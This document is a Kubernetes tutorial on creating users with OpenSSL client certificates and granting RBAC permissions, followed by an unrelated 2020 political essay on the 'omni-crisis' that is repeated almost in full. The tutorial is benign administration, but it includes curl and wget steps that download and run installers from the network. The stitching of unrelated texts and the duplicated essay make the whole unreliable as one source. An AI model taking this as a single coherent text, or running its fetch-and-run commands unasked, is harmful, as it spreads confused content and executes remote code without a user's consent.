title: Users and RBAC authorizations in Kubernetes
author: Robert Walid SOARES
description: Having your Kubernetes cluster up and running is just the start of your journey and you now need to operate. To secure its access, user identities must be declared along with authentication and…
image: https://www.adaltas.com/static/ce2279a25f86b612f1bcda5b90467b2d/f3583/rbac.png
Having your Kubernetes cluster up and running is just the start of your journey: you now need to operate it. To secure its access, user identities must be declared and authentication and authorization properly managed.
Role-based access control (RBAC) is a method of regulating access to computers and network resources based on the roles of individual users within an enterprise. We can use RBAC on all Kubernetes resources that allow CRUD operations (Create, Read, Update, Delete), for example Pods, Deployments, or Namespaces.
Role and ClusterRole
They are just sets of rules that represent permissions. A Role can only be used to grant access to resources within a namespace. A ClusterRole can grant the same permissions as a Role, but it can also grant access to cluster-scoped resources and non-resource endpoints.
We can, of course, create specific Roles and ClusterRoles, but we recommend using the default ones as long as you can: managing many custom roles can quickly become difficult.
Use Case:
We will create two namespaces, “my-project-dev” and “my-project-prod”, and two users, “jean” and “sarah”, with different roles in those namespaces:
my-project-dev:
jean: Edit
my-project-prod:
jean: View
sarah: Edit
User creation and authentication with X.509 client certificates
Normal users are assumed to be managed by an outside, independent service: an admin distributing private keys, a user store like Keystone or Google Accounts, even a file with a list of usernames and passwords. In this regard, Kubernetes does not have objects which represent normal user accounts. Normal users cannot be added to a cluster through an API call. Kubernetes offers several authentication strategies:
Pass a configuration file with content like the following to the API server (a sketch follows this list)
password,username,uid,group
X.509 client certificate
Create a user’s private key and a certificate signing request
Get it certified by a CA (Kubernetes CA) to have the user’s certificate
Bearer Tokens (JSON Web Tokens)
OpenID Connect
On top of OAuth 2.0
Webhooks
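To illustrate the first strategy, the static password file is a CSV file handed to the API server at startup. This is only a sketch, with a hypothetical file path, and note that this basic-auth mode is deprecated and has been removed from recent Kubernetes versions:
# /etc/kubernetes/users.csv, one line per user: password,username,uid,group
mypassword,jean,1001,dev-team
# kube-apiserver startup flag referencing the file:
--basic-auth-file=/etc/kubernetes/users.csv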
For the purpose of this article, we will use X.509 client certificates with OpenSSL for their simplicity. User creation involves several steps, which we will walk through one by one. You have to perform these actions as a user with cluster-admin credentials. Here are the steps for creating a user (here, “jean”):
Create a user on the master machine, then go into its home directory to perform the remaining steps.
useradd jean && cd /home/jean
Create a private key:
openssl genrsa -out jean.key 2048
Create a certificate signing request (CSR). CN is the username and O the group. We can set permissions by group, which can simplify management if we have, for example, multiple users with the same authorizations.
# Without Group
openssl req -new -key jean.key \
-out jean.csr \
-subj "/CN=jean"
# With a Group where $group is the group name
openssl req -new -key jean.key \
-out jean.csr \
-subj "/CN=jean/O=$group"
# If the user has multiple groups
openssl req -new -key jean.key \
-out jean.csr \
-subj "/CN=jean/O=$group1/O=$group2/O=$group3"
Sign the CSR with the Kubernetes CA. We have to use the CA certificate and key, which are normally in /etc/kubernetes/pki/. Our certificate will be valid for 500 days.
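A sketch of the signing command, assuming a kubeadm-style layout where the CA pair lives in /etc/kubernetes/pki/:
openssl x509 -req -in jean.csr \
  -CA /etc/kubernetes/pki/ca.crt \
  -CAkey /etc/kubernetes/pki/ca.key \
  -CAcreateserial \
  -out jean.crt \
  -days 500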
Edit the user config file. The config file holds the information needed to authenticate to the cluster. You can base it on the cluster admin config, which is normally in /etc/kubernetes. The “certificate-authority-data” and “server” values must match those in the cluster admin config.
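A minimal sketch of such a config file, assuming the server address and the base64-encoded CA data are copied from the admin config (placeholders in angle brackets are to be filled in):
apiVersion: v1
kind: Config
clusters:
- cluster:
    certificate-authority-data: <same value as in the admin config>
    server: https://<api-server-address>:6443
  name: kubernetes
contexts:
- context:
    cluster: kubernetes
    user: jean
  name: jean@kubernetes
current-context: jean@kubernetes
users:
- name: jean
  user:
    client-certificate: /home/jean/jean.crt
    client-key: /home/jean/jean.key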
Then we need to copy this config into the .kube directory.
mkdir .kube && vi .kube/config
Now we need to give ownership of all the created files and directories to the user:
chown -R jean: /home/jean/
Now we have the user “jean” created. We will do the same for the user “sarah”. There are many steps to perform, and it can be very time consuming if we have multiple users to create. This is why I wrote bash scripts that automate the process. You can find them on my Github repository.
Now that we have our users, we can create the two namespaces:
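As the cluster admin:
kubectl create namespace my-project-dev
kubectl create namespace my-project-prod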
As we have not defined any authorizations for the users yet, they should be denied access to all cluster resources.
User: Jean
kubectl get nodes
Error from server (Forbidden): nodes is forbidden: User "jean" cannot list resource "nodes" in API group "" at the cluster scope
kubectl get pods -n default
Error from server (Forbidden): pods is forbidden: User "jean" cannot list resource "pods" in API group "" in the namespace "default"
kubectl get pods -n my-project-prod
Error from server (Forbidden): pods is forbidden: User "jean" cannot list resource "pods" in API group "" in the namespace "my-project-prod"
kubectl get pods -n my-project-dev
Error from server (Forbidden): pods is forbidden: User "jean" cannot list resource "pods" in API group "" in the namespace "my-project-dev"
User: Sarah
kubectl get nodes
Error from server (Forbidden): nodes is forbidden: User "sarah" cannot list resource "nodes" in API group "" at the cluster scope
kubectl get pods -n default
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods" in API group "" in the namespace "default"
kubectl get pods -n my-project-prod
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods" in API group "" in the namespace "my-project-prod"
kubectl get pods -n my-project-dev
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods" in API group "" in the namespace "my-project-dev"
We will use the default ClusterRoles available. However, we will show you how to create a specific Role/ClusterRole. A Role or ClusterRole is just a list of verbs (actions) permitted on specific resources and namespaces. Here is an example of a YAML file:
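apiVersion: rbac.authorization.k8s.io/v1beta1
kind: Role
metadata:
  name: list-deployments
  namespace: my-project-dev
rules:
- apiGroups: [ apps ]
  resources: [ deployments ]
  verbs: [ get, list ]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: list-deployments
rules:
- apiGroups: [ apps ]
  resources: [ deployments ]
  verbs: [ get, list ]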
We are now going to bind the default ClusterRoles (edit and view) to our users. We need to create RoleBindings per namespace, not per user: for our user “jean”, we need to create two RoleBindings to cover his authorizations. Here is an example of the RoleBinding YAML files for Jean:
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: jean
namespace: my-project-dev
subjects:
- kind: User
name: jean
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: edit
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: jean
namespace: my-project-prod
subjects:
- kind: User
name: jean
apiGroup: rbac.authorization.k8s.io
roleRef:
kind: ClusterRole
name: view
apiGroup: rbac.authorization.k8s.io
We assign “jean” the view role on “my-project-prod” and the edit role on “my-project-dev”. We will do the same for “sarah”’s authorizations; a sketch of her binding, following the same pattern, is shown below.
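apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: sarah
  namespace: my-project-prod
subjects:
- kind: User
  name: sarah
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: ClusterRole
  name: edit
  apiGroup: rbac.authorization.k8s.io
To create them: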
kubectl apply -f /path/to/your/yaml/file
We have used kubectl apply here instead of kubectl create. The difference is that create only creates the object if it does not exist and does nothing else, while apply creates the object if it does not exist and updates it if needed.
Let’s check if our users have the right permissions.
User: sarah (Edit on “my-project-prod”)
kubectl get pods -n my-project-prod
No resources found.
kubectl run nginx --image=nginx --replicas=1 -n my-project-prod
deployment.apps/nginx created
[sarah@master1 ~]$ kubectl get pods -n my-project-prod
NAME READY STATUS RESTARTS AGE
nginx-7db9fccd9b-t14qw 1/1 Running 0 4s
kubectl get pods -n my-project-dev
Error from server (Forbidden): pods is forbidden: User "sarah" cannot list resource "pods" in API group "" in the namespace "my-project-dev"
kubectl run nginx --image=nginx --replicas=1 -n my-project-dev
Error from server (Forbidden): deployments.apps is forbidden: User "sarah" cannot create resource "deployments" in API group "apps" in the namespace "my-project-dev"
User: jean (View on “my-project-prod” & Edit on “my-project-dev”)
kubectl get pods -n my-project-prod
NAME READY STATUS RESTARTS AGE
nginx-7db9fccd9b-t14qw 1/1 Running 0 101s
[jean@master1 ~]$ kubectl get deploy -n my-project-prod
NAME READY UP-TO-DATE AVAILABLE AGE
nginx 1/1 1 1 110s
kubectl delete deploy/nginx -n my-project-prod
Error from server (Forbidden): deployments.extensions "nginx" is forbidden: User "jean" cannot delete resource "deployments" in API group "extensions" in the namespace "my-project-prod"
kubectl get pods -n my-project-dev
No resources found.
kubectl run nginx --image=nginx --replicas=1 -n my-project-dev
deployment.apps/nginx created
kubectl get deploy -n my-project-dev
NAME READY UP-TO-DATE AVAILABLE AGE
nginx 0/1 1 0 13s
kubectl delete deploy/nginx -n my-project-dev
deployment.extensions "nginx" deleted
kubectl get deploy -n my-project-dev
No resources found.
Manage users and their authorizations
Now that we have set different roles and authorizations for our users, how can we manage all of this? How can we know if a user has the right access? How do we know who can actually perform a specific action? How do we get an overview of all users' access? These are the questions we need to answer to ensure cluster security. Kubernetes provides the command kubectl auth can-i, which tells us whether a user can perform a specific action.
# kubectl auth can-i $action $resource --as $subject
kubectl auth can-i list pods
kubectl auth can-i list pods --as jean
The first command lets a user check whether he can perform an action. The second lets an administrator impersonate a user to check whether the targeted user can perform an action. Impersonation can only be used by a user with cluster-admin credentials. Apart from that, we can't do much more. This is why we will introduce some open-source projects that extend the functionality of the kubectl auth can-i command. Before introducing them, we will install some of their dependencies: Krew and Go.
Go is an open source programming language that makes it easy to build simple, reliable, and efficient software. Inspired by C and Pascal, this language was developed by Google from an initial concept of Robert Griesemer, Rob Pike and Ken Thompson.
wget https://dl.google.com/go/go1.12.5.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.12.5.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
Krew is a tool that makes it easy to use kubectl plugins. Krew helps you discover plugins, install and manage them on your machine. It is similar to tools like apt, dnf or brew. Krew is only compatible with kubectl v1.12 and above.
set -x; cd "$(mktemp -d)" &&
curl -fsSLO "https://storage.googleapis.com/krew/v0.2.1/krew.{tar.gz,yaml}" &&
tar zxvf krew.tar.gz &&
./krew-"$(uname | tr '[:upper:]' '[:lower:]')_amd64" install \
--manifest=krew.yaml --archive=krew.tar.gz
export PATH="${KREW_ROOT:-$HOME/.krew}/bin:$PATH"
Rakkess
This project helps us to know all the authorizations that have been granted to a user. It helps answer the question: what can “jean” do? First, let's install Rakkess:
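One way to set it up, assuming the Go toolchain installed above (the commands below are a sketch; check the project's README for the exact procedure):
go get github.com/corneliusweig/rakkess
# Display the access matrix of the current user
rakkess
# Impersonate another user to review their access
rakkess --as jean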
kubectl-who-can
This project tells us which users can perform a specific action. It helps answer the question: who can do this action? Installation:
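A sketch using Krew, assuming the plugin is published under the name who-can:
kubectl krew install who-can
# Who can delete deployments in my-project-prod?
kubectl who-can delete deployments -n my-project-prod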
RBAC Lookup
This project gives us an RBAC overview. It helps answer the questions: which roles does “jean” have? And “sarah”? All the users? All the groups? To install the project:
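Again via Krew, a sketch with the plugin name assumed from the project's documentation:
kubectl krew install rbac-lookup
# Roles bound to a given user
kubectl rbac-lookup jean
# Roles for every subject of kind user
kubectl rbac-lookup --kind user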
RBAC Manager
This project provides a manager for RBAC, as its name suggests. It simplifies many operations, the most important being RoleBinding creation. Indeed, we saw that if a user needs different roles, we have to create a separate RoleBinding for each. RBAC Manager helps by letting us declare all the authorizations in a single place. To install it, you can download the YAML file from the Github repository:
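For example, assuming the downloaded manifest was saved locally (the file name is hypothetical):
kubectl apply -f rbac-manager.yaml
An RBACDefinition then groups all of a user's bindings in one object, as in this example: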
apiVersion: rbacmanager.reactiveops.io/v1beta1
kind: RBACDefinition
metadata:
name: jose
rbacBindings:
- name: jose
subjects:
- kind: User
name: jose
roleBindings:
- namespace: my-project-prod
clusterRole: edit
- namespace: my-project-dev
clusterRole: edit
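Once applied, this single RBACDefinition yields the two RoleBindings for “jose” (edit on “my-project-prod” and edit on “my-project-dev”) that would otherwise require two separate RoleBinding objects.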
Conclusion
We have created users inside a Kubernetes cluster using X.509 client certificates with OpenSSL and granted them authorizations. You can use the scripts available on my Github repository to create users easily. As for cluster administration, you can use the open-source projects introduced in this article. To sum up those projects:
Rakkess: review all the authorizations granted to a user;
kubectl-who-can: find out who can perform a specific action;
RBAC Lookup: get an overview of the roles bound to users and groups;
RBAC Manager: get simpler configuration that groups bindings together, easy to automate RBAC changes, and label selectors.
It can be very time consuming to handle all the steps of user creation, especially if we have multiple users to create at once and others to create frequently. It would be easier if an enterprise LDAP were connected to the Kubernetes cluster. There are open-source projects that provide a direct LDAP authentication webhook for Kubernetes: Kismatic and ObjectifLibre. Another solution is to configure an OpenID server with your enterprise LDAP as its backend.
title: Hic Sunt Dracones
author: Adam Elkus
description: We are in a period of extended turmoil that might informally be called the “omni-crisis.” There is no clear resolution in sight to the COVID-19 pandemic and the various material,…
01 June 2020
We are in a period of extended turmoil that might informally be called the “omni-crisis.” There is no clear resolution in sight to the COVID-19 pandemic and the various material, psychological, social, economic, and political disruptions it has directly or indirectly produced or accelerated. Escalating civil unrest without an obvious off-ramp now follows in its wake. This moment may pass (hopefully sooner rather than later) and be memory-holed as a particularly nasty but ultimately temporary lapse of collective judgment. If this indeed occurs, this post will likely seem overly dramatic in its warning of a great rupture in the fabric of social space-time. Or current events may be far more sinister and consequential in nature than depicted here. In which case this post may seem overly naive in its refusal to directly entertain the worst-case scenarios. Consider this non-exhaustive list of factors simultaneously operative in America this month:
Historically unpopular and divisive President
The prospect of contested 2020 general elections
Intense political factionalism and micro-factionalism
Widespread economic devastation
Fraying social safety net
100,000+ dead from a pandemic
Half-implemented lockdown
Rising US-China tensions
US exit from international institutions
Widely televised images of security force brutality against civilians
Nationwide protests, riots, and clashes
Clampdowns and threats of further and more severe crackdowns
What do all of these things together mean in totality? Nothing. But also everything. Do not needlessly panic. However, the longer the omni-crisis continues, the narrower and narrower the window for escaping from it without substantial damage will be. But, you say, haven’t we suffered enough? Look at the damage we have already incurred! To butcher a saying applicable to a totally different context, there is plenty of room at the bottom. People grow acclimated to things thought previously intolerable, causing them to (rightly) fear even more terrible outcomes. By our own merits, we’ve already adjusted to a level of uncertainty about social arrangements that we previously thought intolerable. And we may adjust ourselves again sooner than we think.
“Is this as bad as 1968?” is an utterly meaningless question precisely for this underlying reason. People do not invoke 1968 because of the objective similarities between 2020 and 1968. They do so because we have crossed a threshold at which basic foundations of social organization we take for granted now seem up for grabs. This is an inherently subjective determination, based on the circumstances of our present much as people in 1968 similarly judged the state of their worlds to be in flux. 1968 is an arbitrary signpost on an unfamiliar road we are driving down at breakneck speeds. You can blast “Gimme Shelter” on the car stereo for the aesthetic, but it’s not worth much more than that.
The trouble began with the virus. The virus – and the confused and incoherent response to it – shattered patterns of normal life and normal perceptions of agency. The virus is novel, but the collective shock it evokes is a common reaction under such circumstances. Subjective perception of space and time lose coherence and structure, a looming “sense of a foreshortened future” dominates, and the ability to imagine institutional realities as self-perpetuating diminishes. A symptom of this is the manner in which people suddenly find themselves addicted to enormous amounts of raw, unstructured information. There is little context that would allow one to dismiss any particular datum, hence everything is mainlined from the content firehose.
We memorize arcane terminology (“R0”, “IFR”, “CFR”, “flatten the curve”), eagerly consume and circulate contextless numbers, and follow the news ticker for each new arbitrary event. Long-term decision-making capacity decays because each day means less and less basis for the making of substantive binding commitments. Typical scenario analysis becomes less effective because scenarios in this mode are often deviations from a stable baseline. If no such baseline exists then scenario planning in the classical style becomes far less tenable. The omni-crisis is, of course, far more than just the virus but the virus’ utter indifference to human social mythologies makes it a fitting trigger for other cascading failures and heightened contradictions. What happens next? That has not yet been decided. And good luck trying to predict it.
What makes human behavior predictable is constraint. Some constraints are physical and biological. Human beings are subject to physical law much as everything else in the universe is. That which goes up must come down. Force equals mass times acceleration. Likewise, though human lifespans can vary widely, aging is a biological process all humans are subject to. On a related note, death – lurking somewhere in the future – is the ultimate constraint. Other constraints are fuzzier. Human short-term memory storage capacity is limited, but how and why it is limited is not as obvious. Additionally, it is commonly accepted that human minds are subject to physical limitations on information-processing and decision-making, but whether or not this leads to biased and inaccurate thoughts and decisions is a hotly debated subject.
The weakest constraints of all are social constraints. Without norms, conventions, and institutions, humans would constantly need to evaluate their surroundings to get a sense of what their neighbors are doing prior to selecting actions. When these structures constrain behavior, humans can be “thoughtless.” We do not think, we simply do. Because it is the way things have always been done, and we do not need to think about it. We can take things for granted, and project out stable patterns for the duration of our lives. Social constraints flatten, canalize, and domesticate human behavior, and they are what largely make “social science” possible. The social scientist searches for stable regularities to document, but everyday citizens depend on them to go about life without worry.
When social constraints are weakened, the aggregate predictability of human behavior diminishes. Why? The weakening of constraints generates confusion. Things have always worked until they suddenly break. Things have always been decided for you until you have to suddenly decide on your own. Another way of thinking about social constraints – with a very long history in social science – posits them as involuntarily assigned expectations about the future. Prolonged and severe disruption of expectations without immediate prospect of relief accordingly should create greater variance in potential outcomes. The simplest way to understand the omni-crisis is as the sustained breaking of expectations and disruption of the ability to simulate the future forward using assumed constraints.
We ordinarily associate these periods with times of revolutionary change, imagining people pursuing goals they never previously imagined possible. We imagine great movements and organizations. There is some truth to this, but the reality is both far more banal and terrifying simultaneously. When institutional realities no longer appear to be self-perpetuating, people struggle to think a day or even a few hours ahead at a time. Tanner Greer captures the half-organized quality of collective decision-making in moments of disorder in describing the emergence of riots:
This then is the general pattern of riots: An event occurs that signals to would-be rioters that they may soon be able to riot. This event gathers a crowd. A significant percentage of this crowd—though rarely, it seems, the majority—are eager for destruction. An entrepreneurial would-be rioter tests the crowd for the presence of other rioters by engaging in a minor (yet easily perceived) act of carnage. Other rioters follow suit, and as the number of offenders grow so does their willingness to take increasingly brazen acts of vandalism, theft, or violence. Notice that this schema is value neutral: it describes both the football hooligan and the race rioter, 19th century Russian pogroms and 21st century Hong Kong street battles. In all of these a certain percentage of the participants plays the game for fairly mundane reasons: to revel in excitement or terror, lose themselves in a rare sense of solidarity, belonging, or power, or to simply gain the monetary rewards that come with theft and looting. The proportion of the population willing to join a riot to attain these things likely reflects the proportion of the population otherwise cut off from them in normal times. Few rioters are married men who must be at work at 8:00 AM the next morning.
As Greer hints, disruptions have historically cast an unflattering light on certain inconvenient aspects of human nature. Since ancient times, humans have understood that stability hinders the full expression of particular personalities that suddenly discover outlets in prolonged episodes of disorder and confusion. Greer describes a particular subset of them – people who suddenly acquire a means of satisfying desires for stimulation, community, revenge, fulfillment of generalized base emotions, money, and particular material goods. The outlet for this is collective anti-social behavior. But if we look beyond the singular event type of the riot, we can also see something similar at work in mass behavior.
Large numbers of people lack stable identities and preferences. They are easily influenced by whatever novel state or circumstance they find themselves in. They will follow the rebels one day and demand the gendarmes open fire on the aforementioned rebels the day after. Others systematically falsify their preferences. Moments of disorder may reveal they lack any principled desire to support the Powers That Be once visible authority weakens. But, alternatively, disorder also may reveal that they are willing to tolerate brutal violence against their fellow citizens out of fear or a desire for stability. Finally, there will always be ambitious and dangerous men and women who see disorder as an opportunity to exploit the passions, fears, and desires of others to attain power, glory, respect, and spoils denied to them during more peaceful and stable times.
No one really “owns” prolonged and often contested periods of disruption, making discussions of who is an insider and who is an outsider often hopelessly subjective in the abstract and highly contextual in the particular. There is always a large mass of people with a diversity of motives, attitudes, dispositions, and ideologies. And while many are unavoidably thinking in the short term, there is also an unequal distribution of planning capacity. Some can see multiple moves down the game tree. Others act more or less reactively and in a pre-programmed fashion. This applies both to people engaging in traditional risk-seeking behaviors as well as ordinary “normies” with families and suburban homes. And it certainly applies to the assorted mixture of professional and amateur propagandists seeking to shape perceptions behind the scenes.
Over the long scope of human history, the progressive saturation of external mechanisms for storing, transmitting, and modifying information makes so-called “stand alone complexes” more and more prevalent. A stand alone complex is copycat behavior without a true originating behavior. A rumored and heavily publicized action – not necessarily real but only supposed – can motivate a subset of people to imitate it. They move towards the same posited end as the behavior, even if the behavior itself never originally took place. People acting individually thus can cooperate unknowingly towards that end as if they acted in a pre-planned manner. While the term was popularized by science fiction, the actual fiction in question merely harkens back to the turmoil of the 1960s and 70s and its wave of highly publicized militant actions. The tweet, in other words, recapitulates the photo or broadcast.
The present saturation of electronic media (television, radio, and online communications) also enables rapid and often whiplash-inducing swings of opinion among both elite tastemakers and plugged-in information consumers. These sudden swings, in which everyone is demanded to suddenly accommodate themselves to their group’s new consensus narrative, occur too frequently for anyone to hope to adapt to them. After each swing, the group makes a totalizing demand that the individual publicly submit to the new motto and signal support for it. Failure to do so results in both direct social pressure being suddenly applied to individuals as well as powerful individual fears of being severed from meaningful social connections. But with consensus ephemeral, another swing could be days or even hours or minutes away.
Above all else, prolonged disruptions tend to alter the calculations of those still capable of calculating at all during stressful times. Once-sure bets are cast aside, forcing hedging behaviors and consideration of previously taboo actions and operations. This becomes particularly dangerous during competitive or broadly zero-sum interactions. The most important variables for predicting what kinds of choices are made during such interactions are often unobservable to both observers and participants and only seem retroactively obvious. And the more convoluted the decision, the more untangling it requires thinking about what actors expect other actors to do given what they expect other actors to do, and so forth.
Let’s be clear. Responsibility is not equal. The omni-crisis drags on because there is little desire or ability on the part of authorities to resolve the confusion prolonged disruption generates. Their actions are often negligent or irresponsible at best. At worst, they are deliberately malicious and hateful. Much more can and should be said about this. But the overriding message of this post is that the omni-crisis has significantly enlarged the space of possible outcomes beyond that normally considered day-to-day by most Americans. And it is not clear how many people in positions of influence and authority recognize this at all. They cheer on their favored factions and issue inflammatory declarations and demands. Do they know there are dragons where we are going? And, more disturbingly, do they even care?
01 June 2020
We are in a period of extended turmoil that might informally be called the “omni-crisis.” There is no clear resolution in sight to the COVID-19 pandemic and the various material, psychological, social, economic, and political disruptions it has directly or indirectly produced or accelerated. Escalating civil unrest without an obvious off-ramp now follows in its wake. This moment may pass (hopefully sooner rather than later) and be memory-holed as a particularly nasty but ultimately temporary lapse of collective judgment. If this indeed occurs, this post will likely seem overly dramatic in its warning of a great rupture in the fabric of social space-time. Or current events may be far more sinister and consequential in nature than depicted here. In which case this post may seem overly naive in its refusal to directly entertain the worst-case scenarios. Consider this non-exhaustive list of factors simultaneously operative in America this month:
Historically unpopular and divisive President
The prospect of contested 2020 general elections
Intense political factionalism and micro-factionalism
Widespread economic devastation
Fraying social safety net
100,000+ dead from a pandemic
Half-implemented lockdown
Rising US-China tensions
US exit from international institutions
Widely televised images of security force brutality against civilians
Nationwide protests, riots, and clashes
Clampdowns and threats of further and more severe crackdowns
What do all of these things together mean in totality? Nothing. But also everything. Do not needlessly panic. However, the longer the omni-crisis continues, the narrower and narrower the window for escaping from it without substantial damage will be. But, you say, haven’t we suffered enough? Look at the damage we have already incurred! To butcher a saying applicable to a totally different context, there is plenty of room at the bottom. People grow acclimated to things thought previously intolerable, causing them to (rightly) fear even more terrible outcomes. By our own merits, we’ve already adjusted to a level of uncertainty about social arrangements that we previously thought intolerable. And we may adjust ourselves again sooner than we think.
“Is this as bad as 1968?” is an utterly meaningless question precisely for this underlying reason. People do not invoke 1968 because of the objective similarities between 2020 and 1968. They do so because we have crossed a threshold at which basic foundations of social organization we take for granted now seem up for grabs. This is an inherently subjective determination, based on the circumstances of our present much as people in 1968 similarly judged the state of their worlds to be in flux. 1968 is an arbitrary signpost on an unfamiliar road we are driving down at breakneck speeds. You can blast “Gimme Shelter” on the car stereo for the aesthetic, but it’s not worth much more than that.
The trouble began with the virus. The virus – and the confused and incoherent response to it – shattered patterns of normal life and normal perceptions of agency. The virus is novel, but the collective shock it evokes is a common reaction under such circumstances. Subjective perception of space and time lose coherence and structure, a looming “sense of a foreshortened future” dominates, and the ability to imagine institutional realities as self-perpetuating diminishes. A symptom of this is the manner in which people suddenly find themselves addicted to enormous amounts of raw, unstructured, information. There is little context that would allow one to dismiss any particular datum, hence everything is mainlined from the content firehose.
We memorize arcane terminology (“R0”, “IFR”, “CFR”, “flatten the curve”), eagerly consume and circulate contextless numbers, and follow the news ticker for each new arbitrary event. Long-term decision-making capacity decays because each day means less and less basis for the making of substantive binding commitments. Typical scenario analysis becomes less effective because scenarios in this mode are often deviations from a stable baseline. If no such baseline exists then scenario planning in the classical style becomes far less tenable. The omni-crisis is, of course, far more than just the virus but the virus’ utter indifference to human social mythologies makes it a fitting trigger for other cascading failures and heightened contradictions. What happens next? That has not yet been decided. And good luck trying to predict it.
What makes human behavior predictable is constraint. Some constraints are physical and biological. Human beings are subject to physical law much as everything else in the universe is. That which goes up must come down. Force equals mass times acceleration. Likewise, though human lifespans can vary widely, aging is a biological process all humans are subject to. On a related note, death – lurking somewhere in the future – is the ultimate constraint. Other constraints are fuzzier. Human short-term memory capacity is limited, but how and why it is limited is not as obvious. Additionally, it is commonly accepted that human minds are subject to physical limitations on information-processing and decision-making, but whether or not this leads to biased and inaccurate thoughts and decisions is a hotly debated subject.
The weakest constraints of all are social constraints. Without norms, conventions, and institutions, humans would constantly need to evaluate their surroundings to get a sense of what their neighbors are doing prior to selecting actions. When these structures constrain behavior, humans can be “thoughtless.” We do not think, we simply do. Because it is the way things have always been done, and we do not need to think about it. We can take things for granted, and project out stable patterns for the duration of our lives. Social constraints flatten, canalize, and domesticate human behavior, and they are what largely make “social science” possible. The social scientist searches for stable regularities to document, but everyday citizens depend on them to go about life without worry.
When social constraints are weakened, the aggregate predictability of human behavior diminishes. Why? The weakening of constraints generates confusion. Things have always worked until they suddenly break. Things have always been decided for you until you have to suddenly decide on your own. Another way of thinking about social constraints – one with a very long history in social science – posits them as involuntarily assigned expectations about the future. Prolonged and severe disruption of expectations without immediate prospect of relief should accordingly create greater variance in potential outcomes. The simplest way to understand the omni-crisis is as the sustained breaking of expectations and disruption of the ability to simulate the future forward using assumed constraints.
We ordinarily associate these periods with times of revolutionary change, imagining people pursuing goals they never previously imagined possible. We imagine great movements and organizations. There is some truth to this, but the reality is both far more banal and terrifying simultaneously. When institutional realities no longer appear to be self-perpetuating, people struggle to think a day or even a few hours ahead at a time. Tanner Greer captures the half-organized quality of collective decision-making in moments of disorder in describing the emergence of riots:
This then is the general pattern of riots: An event occurs that signals to would-be rioters that they may soon be able to riot. This event gathers a crowd. A significant percentage of this crowd—though rarely, it seems, the majority—are eager for destruction. An entrepreneurial would-be rioter tests the crowd for the presence of other rioters by engaging in a minor (yet easily perceived) act of carnage. Other rioters follow suit, and as the number of offenders grow so does their willingness to take increasingly brazen acts of vandalism, theft, or violence. Notice that this schema is value neutral: it describes both the football hooligan and the race rioter, 19th century Russian pogroms and 21st century Hong Kong street battles. In all of these a certain percentage of the participants plays the game for fairly mundane reasons: to revel in excitement or terror, lose themselves in a rare sense of solidarity, belonging, or power, or to simply gain the monetary rewards that come with theft and looting. The proportion of the population willing to join a riot to attain these things likely reflects the proportion of the population otherwise cut off from them in normal times. Few rioters are married men who must be at work at 8:00 AM the next morning.
As Greer hints, disruptions have historically cast an unflattering light on certain inconvenient aspects of human nature. Since ancient times, humans have understood that stability hinders the full expression of particular personalities that suddenly discover outlets in prolonged episodes of disorder and confusion. Greer describes a particular subset of them – people who suddenly acquire a means of satisfying desires for stimulation, community, revenge, fulfillment of generalized base emotions, money, and particular material goods. The outlet for this is collective anti-social behavior. But if we look beyond the singular event type of the riot, we can also see something similar at work in mass behavior.
Large numbers of people lack stable identities and preferences. They are easily influenced by whatever novel state or circumstance they find themselves in. They will follow the rebels one day and demand the gendarmes open fire on the aforementioned rebels the day after. Others systematically falsify their preferences. Moments of disorder may reveal they lack any principled desire to support the Powers That Be once visible authority weakens. But, alternatively, disorder also may reveal that they are willing to tolerate brutal violence against their fellow citizens out of fear or a desire for stability. Finally, there will always be ambitious and dangerous men and women who see disorder as an opportunity to exploit the passions, fears, and desires of others to attain power, glory, respect, and spoils denied to them during more peaceful and stable times.
No one really “owns” prolonged and often contested periods of disruption, making discussions of who is an insider and who is an outsider often hopelessly subjective in the abstract and highly contextual in the particular. There is always a large mass of people with a diversity of motives, attitudes, dispositions, and ideologies. And while many are unavoidably thinking in the short term, there is also an unequal distribution of planning capacity. Some can see multiple moves down the game tree. Others act more or less reactively and in a pre-programmed fashion. This applies both to people engaging in traditional risk-seeking behaviors as well as ordinary “normies” with families and suburban homes. And it certainly applies to the assorted mixture of professional and amateur propagandists seeking to shape perceptions behind the scenes.
Over the long scope of human history, the progressive saturation of external mechanisms for storing, transmitting, and modifying information makes so-called “stand alone complexes” more and more prevalent. A stand alone complex is copycat behavior without a true originating behavior. A rumored and heavily publicized action – not necessarily real but only supposed – can motivate a subset of people to imitate it. They move towards the same posited end as the behavior, even if the behavior itself never originally took place. People acting individually thus can cooperate unknowingly towards that end as if they acted in a pre-planned manner. While the term was popularized by science fiction, the fiction in question merely harkens back to the turmoil of the 1960s and 70s and its wave of highly publicized militant actions. The tweet, in other words, recapitulates the photo or broadcast.
The present saturation of electronic media (television, radio, and online communications) also enables rapid and often whiplash-inducing swings of opinion among both elite tastemakers and plugged-in information consumers. These sudden swings, in which everyone is expected to accommodate themselves to their group’s new consensus narrative, occur too frequently for anyone to hope to adapt to them. After each swing, the group makes a totalizing demand that the individual publicly submit to the new motto and signal support for it. Failure to do so results both in direct social pressure being suddenly applied to individuals and in powerful individual fears of being severed from meaningful social connections. But with consensus ephemeral, another swing could be days or even hours or minutes away.
Above all else, prolonged disruptions tend to alter the calculations of those still capable of calculating at all during stressful times. Once-sure bets are cast aside, forcing hedging behaviors and consideration of previously taboo actions and operations. This becomes particularly dangerous during competitive or broadly zero-sum interactions. The most important variables for predicting what kinds of choices are made during such interactions are often unobservable to both observers and participants, and only seem retroactively obvious. And the more convoluted the decision, the more untangling it requires: thinking about what actors expect other actors to do given what they expect other actors to do, and so forth.
